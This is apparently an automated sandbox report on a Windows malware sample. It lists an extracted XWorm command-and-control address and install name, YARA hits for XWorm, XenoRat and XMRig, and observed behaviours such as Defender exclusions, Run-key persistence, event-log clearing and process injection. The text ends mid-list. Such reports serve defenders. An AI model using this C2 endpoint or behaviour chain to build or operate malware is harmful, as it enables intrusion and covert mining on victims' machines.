Analysis
-
max time kernel
99s -
max time network
281s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
23/03/2025, 16:26
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
xworm
5.0
217.195.153.81:50002
-
install_file
Mason.exe
Signatures
-
Asyncrat family
-
Detect XenoRat Payload 2 IoCs
resource yara_rule behavioral1/files/0x001a00000002b24b-476.dat family_xenorat behavioral1/memory/5336-653-0x00000000009C0000-0x00000000009E6000-memory.dmp family_xenorat -
Detect Xworm Payload 8 IoCs
resource yara_rule behavioral1/files/0x001e00000002b1a0-471.dat family_xworm behavioral1/files/0x001900000002b249-491.dat family_xworm behavioral1/memory/5496-644-0x0000000000D20000-0x0000000000D4E000-memory.dmp family_xworm behavioral1/memory/5616-722-0x0000016D4BAC0000-0x0000016D4BB00000-memory.dmp family_xworm behavioral1/memory/5616-1008-0x0000016D662A0000-0x0000016D662AE000-memory.dmp family_xworm behavioral1/memory/1200-1446-0x0000000000F60000-0x0000000000F8E000-memory.dmp family_xworm behavioral1/memory/5484-1655-0x0000000000880000-0x00000000008AE000-memory.dmp family_xworm behavioral1/memory/6108-2245-0x00000000008A0000-0x00000000008CE000-memory.dmp family_xworm -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 1676 created 2500 1676 WerFault.exe 177 -
Suspicious use of NtCreateUserProcessOtherParentProcess 23 IoCs
description pid Process procid_target PID 6140 created 3280 6140 new.exe 52 PID 6140 created 3280 6140 new.exe 52 PID 6140 created 3280 6140 new.exe 52 PID 6140 created 3280 6140 new.exe 52 PID 3300 created 3280 3300 updater.exe 52 PID 700 created 3280 700 testo.exe 52 PID 700 created 3280 700 testo.exe 52 PID 700 created 3280 700 testo.exe 52 PID 3300 created 3280 3300 updater.exe 52 PID 700 created 3280 700 testo.exe 52 PID 3300 created 3280 3300 updater.exe 52 PID 3300 created 3280 3300 updater.exe 52 PID 3300 created 3280 3300 updater.exe 52 PID 5936 created 3280 5936 Best.exe 52 PID 5936 created 3280 5936 Best.exe 52 PID 4468 created 2500 4468 svchost.exe 177 PID 4468 created 5024 4468 svchost.exe 181 PID 5936 created 3280 5936 Best.exe 52 PID 4228 created 3280 4228 updater.exe 52 PID 4228 created 3280 4228 updater.exe 52 PID 4228 created 3280 4228 updater.exe 52 PID 4228 created 3280 4228 updater.exe 52 PID 2180 created 3280 2180 testo.exe 52 -
Xenorat family
-
Xmrig family
-
Xworm family
-
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/memory/3300-640-0x00007FF785140000-0x00007FF7856F8000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 28 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1444 powershell.exe 796 powershell.exe 5300 powershell.exe 3948 powershell.exe 5568 powershell.exe 1960 powershell.exe 5480 powershell.exe 6040 powershell.exe 4576 powershell.exe 6000 powershell.exe 2192 powershell.exe 5412 powershell.exe 2404 powershell.exe 1376 powershell.exe 1744 powershell.exe 2584 powershell.exe 3328 powershell.exe 5460 powershell.exe 2836 powershell.exe 2008 powershell.exe 6120 powershell.exe 3128 powershell.exe 4724 powershell.exe 5140 powershell.exe 980 powershell.exe 5940 powershell.exe 4380 powershell.exe 1948 powershell.exe -
Downloads MZ/PE file 7 IoCs
flow pid Process 21 5052 chrome.exe 21 5052 chrome.exe 21 5052 chrome.exe 21 5052 chrome.exe 21 5052 chrome.exe 21 5052 chrome.exe 21 5052 chrome.exe -
.NET Reactor proctector 9 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x001900000002b24d-466.dat net_reactor behavioral1/files/0x001e00000002b1a0-471.dat net_reactor behavioral1/files/0x001a00000002b24b-476.dat net_reactor behavioral1/memory/2148-634-0x00000000004C0000-0x0000000000510000-memory.dmp net_reactor behavioral1/memory/5496-644-0x0000000000D20000-0x0000000000D4E000-memory.dmp net_reactor behavioral1/memory/5336-653-0x00000000009C0000-0x00000000009E6000-memory.dmp net_reactor behavioral1/memory/1200-1446-0x0000000000F60000-0x0000000000F8E000-memory.dmp net_reactor behavioral1/memory/5484-1655-0x0000000000880000-0x00000000008AE000-memory.dmp net_reactor behavioral1/memory/6108-2245-0x00000000008A0000-0x00000000008CE000-memory.dmp net_reactor -
Executes dropped EXE 13 IoCs
pid Process 6140 new.exe 3300 updater.exe 700 testo.exe 2148 Winrar.exe 5496 Update.exe 5336 SecurityHealth.exe 4828 SecurityHealth.exe 2080 Winrar.exe 5616 Fresh.exe 2340 4y3ovtul.fs3.exe 5936 Best.exe 4228 updater.exe 2180 testo.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhostw = "C:\\Users\\Admin\\AppData\\Roaming\\taskhostw.exe" Update.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 61 raw.githubusercontent.com 62 raw.githubusercontent.com 63 raw.githubusercontent.com 2 raw.githubusercontent.com 19 raw.githubusercontent.com 21 raw.githubusercontent.com -
Power Settings 1 TTPs 50 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3100 powercfg.exe 4624 cmd.exe 2104 powercfg.exe 4252 cmd.exe 788 powercfg.exe 5024 powercfg.exe 2592 powercfg.exe 1212 cmd.exe 952 powercfg.exe 3576 powercfg.exe 5740 powercfg.exe 5604 powercfg.exe 1108 powercfg.exe 2084 powercfg.exe 5712 powercfg.exe 3016 cmd.exe 1816 powercfg.exe 4820 powercfg.exe 4648 cmd.exe 4564 powercfg.exe 2712 powercfg.exe 4036 powercfg.exe 460 cmd.exe 4928 powercfg.exe 660 cmd.exe 1028 cmd.exe 2440 powercfg.exe 4456 powercfg.exe 5592 powercfg.exe 2208 powercfg.exe 2500 powercfg.exe 5632 powercfg.exe 5016 powercfg.exe 1156 powercfg.exe 4604 cmd.exe 3036 powercfg.exe 3912 cmd.exe 6096 powercfg.exe 1664 powercfg.exe 3260 powercfg.exe 5124 powercfg.exe 3988 powercfg.exe 3640 powercfg.exe 980 powercfg.exe 3324 powercfg.exe 376 powercfg.exe 572 powercfg.exe 2272 powercfg.exe 2840 powercfg.exe 3836 powercfg.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\SecurityHealth svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3300 set thread context of 5312 3300 updater.exe 140 PID 3300 set thread context of 5316 3300 updater.exe 141 PID 4228 set thread context of 4344 4228 updater.exe 195 PID 4228 set thread context of 4508 4228 updater.exe 196 -
Drops file in Program Files directory 5 IoCs
description ioc Process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Chrome\updater.exe Best.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Chrome\updater.exe new.exe File created C:\Program Files\Google\Chrome\updater.exe testo.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 7 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification C:\Users\Admin\Downloads\Fresh.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Best.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\new.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\testo.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Winrar.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Update.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\SecurityHealth.exe:Zone.Identifier chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Winrar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecurityHealth.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecurityHealth.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Winrar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4636 timeout.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings chrome.exe -
NTFS ADS 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\XenoManager\SecurityHealth.exe\:Zone.Identifier:$DATA SecurityHealth.exe File opened for modification C:\Users\Admin\Downloads\new.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\testo.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Winrar.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Update.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\SecurityHealth.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Fresh.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Best.exe:Zone.Identifier chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4500 SCHTASKS.exe 4284 schtasks.exe 1324 schtasks.exe 3508 schtasks.exe 5124 SCHTASKS.exe 5608 SCHTASKS.exe 3828 schtasks.exe 4388 SCHTASKS.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5496 Update.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 6140 new.exe 6140 new.exe 1744 powershell.exe 1744 powershell.exe 6140 new.exe 6140 new.exe 6140 new.exe 6140 new.exe 4724 powershell.exe 4724 powershell.exe 6140 new.exe 6140 new.exe 3300 updater.exe 3300 updater.exe 1444 powershell.exe 1444 powershell.exe 700 testo.exe 700 testo.exe 796 powershell.exe 796 powershell.exe 700 testo.exe 700 testo.exe 700 testo.exe 700 testo.exe 5140 powershell.exe 5140 powershell.exe 5140 powershell.exe 3300 updater.exe 3300 updater.exe 700 testo.exe 700 testo.exe 3300 updater.exe 3300 updater.exe 980 powershell.exe 980 powershell.exe 3300 updater.exe 3300 updater.exe 3300 updater.exe 3300 updater.exe 5316 explorer.exe 5316 explorer.exe 5316 explorer.exe 5316 explorer.exe 5316 explorer.exe 5316 explorer.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe 2148 Winrar.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe Token: SeShutdownPrivilege 4416 chrome.exe Token: SeCreatePagefilePrivilege 4416 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe 4416 chrome.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5496 Update.exe 2340 4y3ovtul.fs3.exe 2080 Winrar.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4416 wrote to memory of 3412 4416 chrome.exe 78 PID 4416 wrote to memory of 3412 4416 chrome.exe 78 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 5052 4416 chrome.exe 79 PID 4416 wrote to memory of 5052 4416 chrome.exe 79 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 wrote to memory of 452 4416 chrome.exe 80 PID 4416 